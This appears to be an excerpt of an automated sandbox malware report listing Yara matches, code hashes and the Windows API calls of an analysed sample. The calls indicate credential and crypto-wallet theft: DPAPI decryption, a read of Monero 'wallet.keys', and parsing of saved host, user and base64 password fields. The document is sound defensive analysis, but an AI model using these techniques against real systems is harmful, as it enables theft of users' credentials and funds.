                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: RYgx$ZNWm$cL~$ykY
                              • API String ID: 0-448492925
                              • Opcode ID: a8144c172d8d1f37acc14e3b05664908b94eb1ed85afec539c88fae608768854
                              • Instruction ID: d7cc10a453981cc5c80b90401c1d5bb7aa1985774b34545957b2e4e2a4e6b055
                              • Opcode Fuzzy Hash: a8144c172d8d1f37acc14e3b05664908b94eb1ed85afec539c88fae608768854
                              • Instruction Fuzzy Hash: 6FB227F3A0C2049FE304AE2DEC8567AFBE9EF94720F16493DEAC5C3744E63558058696
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,004B5184,40000001,00000000,00000000,?,004B5184), ref: 004C8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: f13eecf7153d075038a5d564c6c1d6a0295a5372d5f28ccdce042aacf914553f
                              • Instruction ID: a84b174c4f5850074c0d9f5a047d381f70f219abcc75d26ab774c334aee00112
                              • Opcode Fuzzy Hash: f13eecf7153d075038a5d564c6c1d6a0295a5372d5f28ccdce042aacf914553f
                              • Instruction Fuzzy Hash: DD110AB8200204AFDB40CFA4D884FB737AAAF89314F10955DF919CB250DB79E841DB69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0118DB48,00000000,?,004D0E10,00000000,?,00000000,00000000), ref: 004C7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0118DB48,00000000,?,004D0E10,00000000,?,00000000,00000000,?), ref: 004C7A7D
                              • wsprintfA.USER32 ref: 004C7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8971d0ec7026088042c85f55c1c06356afa889af16e3bc41774178f6a3e173e7
                              • Instruction ID: ec0020c9fc5b895235c33265ebef296a7bf5609c3bd57638e5fbfd2abfaf6366
                              • Opcode Fuzzy Hash: 8971d0ec7026088042c85f55c1c06356afa889af16e3bc41774178f6a3e173e7
                              • Instruction Fuzzy Hash: AA118EB1945218EBEB208B94DC49FAAB778FB04761F1043AAE91A932C0D7781E40CF55
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6q$8**z$Rop
                              • API String ID: 0-1000716968
                              • Opcode ID: a2f9a2c3ec0b463d80b445b694290f10c42f0e0121c87881013ff17843c78946
                              • Instruction ID: 3b9f17dff494619f332e17f3ee656e73a6e3dab1ef49bcaee82a2f8648effeba
                              • Opcode Fuzzy Hash: a2f9a2c3ec0b463d80b445b694290f10c42f0e0121c87881013ff17843c78946
                              • Instruction Fuzzy Hash: 20B227F3A0C2049FE304AE2DEC85A7AFBE9EF94720F16453DE6C5C3744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8O^7$jVw$y=u
                              • API String ID: 0-2459849181
                              • Opcode ID: 1fe14ca93d248b458979f9572dfb5a0a0ee678e8ee93cac76fe48b60c0b356c2
                              • Instruction ID: c6f5ef0e0499037a46e13870cac6fb0532623ec783ede9747090b3eb16e2e24e
                              • Opcode Fuzzy Hash: 1fe14ca93d248b458979f9572dfb5a0a0ee678e8ee93cac76fe48b60c0b356c2
                              • Instruction Fuzzy Hash: 6F7215F360C2009FE308AE29EC8567AF7E9EF94720F16893DE6C4C7744EA3558458796
                              APIs
                              • CoCreateInstance.COMBASE(004CE118,00000000,00000001,004CE108,00000000), ref: 004C3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004C37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 843b9fc49db7ac53c06b4abc7cadf448e78e0aad3c9bbaab9b7fe60f7c0fa1c5
                              • Instruction ID: 42739a16ad2e16bafd80b4271123d4ef605093d065affdbf4942f3954f1eb486
                              • Opcode Fuzzy Hash: 843b9fc49db7ac53c06b4abc7cadf448e78e0aad3c9bbaab9b7fe60f7c0fa1c5
                              • Instruction Fuzzy Hash: 97410774A00A289FDB24DF58CC94F9BB7B5BB48306F4091D9E608A7290D7756E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004B9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004B9BA3
                              • LocalFree.KERNEL32(?), ref: 004B9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 3083bf430d54a06be068bb65e4da8c2b756c96971c9404b8cfb862bf66d6f878
                              • Instruction ID: c06a6125b5718221989284e4a3bf71138ef0e785f151d11fc7585ca260926076
                              • Opcode Fuzzy Hash: 3083bf430d54a06be068bb65e4da8c2b756c96971c9404b8cfb862bf66d6f878
                              • Instruction Fuzzy Hash: 6311B7B8A00209EFCB04DF94D985AAE77F9FF88300F104599E915AB350D774AE10CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &|x$v\_
                              • API String ID: 0-2058981586
                              • Opcode ID: 8a685159066578bdff9fbe6b24483568c5b05411a80007f2604fc6d2ddb2c04e
                              • Instruction ID: 44f0d559a232d966639805f111be18777e83cd68ed5788e225766e67382e1c77
                              • Opcode Fuzzy Hash: 8a685159066578bdff9fbe6b24483568c5b05411a80007f2604fc6d2ddb2c04e
                              • Instruction Fuzzy Hash: D0B207F360C2049FE304AE2DEC8567AB7E9EF94720F1A493DE6C5C3744EA3598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ppU|
                              • API String ID: 0-2163573718
                              • Opcode ID: 55e8b482c9de3ed07ba4af7614219345d6ad43ab630a0c6ee703b605212e1667
                              • Instruction ID: 67d54ea1c415d7be68496747b960fe2b73f25830f5e7244a706e332e6eea92c5
                              • Opcode Fuzzy Hash: 55e8b482c9de3ed07ba4af7614219345d6ad43ab630a0c6ee703b605212e1667
                              • Instruction Fuzzy Hash: 4D52D4F360C600AFE7046E29EC8567AFBE5EFD4720F1A893DE6C4C7744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @?r
                              • API String ID: 0-3171989146
                              • Opcode ID: 1d9954b8e28e44c41c70730d6183f49413cb645cc386e3c588b7dc42bc924125
                              • Instruction ID: 9fe0b787edf19d6e2d19a67288d0978589ec1757d268ac5a1da51a12706aee2e
                              • Opcode Fuzzy Hash: 1d9954b8e28e44c41c70730d6183f49413cb645cc386e3c588b7dc42bc924125
                              • Instruction Fuzzy Hash: 955168B7A181289BE3046D2CDC15B7BB7D9DB90210F2A823DED84D7784EE25D9058292
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 341ddd680c8637d0e42298dafee762f40e87829eaa3c0d6822e2e4cf37f8d005
                              • Instruction ID: 401f36a857cbe712d6920d533a514fffbe665468c63863eedfa5f7d33a4b3183
                              • Opcode Fuzzy Hash: 341ddd680c8637d0e42298dafee762f40e87829eaa3c0d6822e2e4cf37f8d005
                              • Instruction Fuzzy Hash: 69516DB3A1C2008FE308AE2CDC8577AB7E5EB98720F16453DE6C5D7744E9355D058786
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef4d96188ddacad7804925571994990d1937dcf36e17a611642de5933d2b84e3
                              • Instruction ID: 7d1fdb3af95a981f19f2f2b053253ceb52ac4e2605fce2b579b156f2662e2459
                              • Opcode Fuzzy Hash: ef4d96188ddacad7804925571994990d1937dcf36e17a611642de5933d2b84e3
                              • Instruction Fuzzy Hash: B05125F3E086144BF300A969EC84356B2D6AB94320F1B463CDF98E7385E97C5C06828A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61f94859c4e5383586b8161c16f4881fe3f2046b677c99e1038114dabb5a8583
                              • Instruction ID: c41fdfff6671da12650806fdc3571133791389010a7262af2e67d26df94a75f2
                              • Opcode Fuzzy Hash: 61f94859c4e5383586b8161c16f4881fe3f2046b677c99e1038114dabb5a8583
                              • Instruction Fuzzy Hash: 0E414AF3E043185BE310793DED8536BBBDA9BD0750F2A4238DF8453B88F97569098196
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b667aa201ed90247e32915dbadf8959fe8abb933cf4acd88404429a7b7278ae3
                              • Instruction ID: 01bdbd10f48bfba7a77ec287578f2dc6fc0e4104172e65b08380cb33074b3284
                              • Opcode Fuzzy Hash: b667aa201ed90247e32915dbadf8959fe8abb933cf4acd88404429a7b7278ae3
                              • Instruction Fuzzy Hash: A74139F3A081046BE318592DEC557BB77DADBD4320F1E853DEB99D3780E93988018296
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a9f89480776b9401729e3160dfe2c7c90a33d873550bb789b21f258da10741b
                              • Instruction ID: 76a4662b52ebee803b1eac66eeb791c834aa5d1aca612c54159d691f06c36c04
                              • Opcode Fuzzy Hash: 7a9f89480776b9401729e3160dfe2c7c90a33d873550bb789b21f258da10741b
                              • Instruction Fuzzy Hash: 804106F3D196209BE7046E28EC457AABBE5EB50320F1B053DEAD4E7780DA359C4087C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24a775c3d763bbdefc40b8a9aad68b55b7d7a541d7906261f37db850d0afd5b6
                              • Instruction ID: 14805a77fd10fa150807af5d52602fac0cad7d94f9e2aa137aef611702a8f676
                              • Opcode Fuzzy Hash: 24a775c3d763bbdefc40b8a9aad68b55b7d7a541d7906261f37db850d0afd5b6
                              • Instruction Fuzzy Hash: C23147B39082149FE3107D3DDC496AAFBDADB94720F1B063ED5D497784ED3599008682
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,004D0DBA,004D0DB7,004D0DB6,004D0DB3), ref: 004C0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004C0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004C03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 004C0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004C0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0502
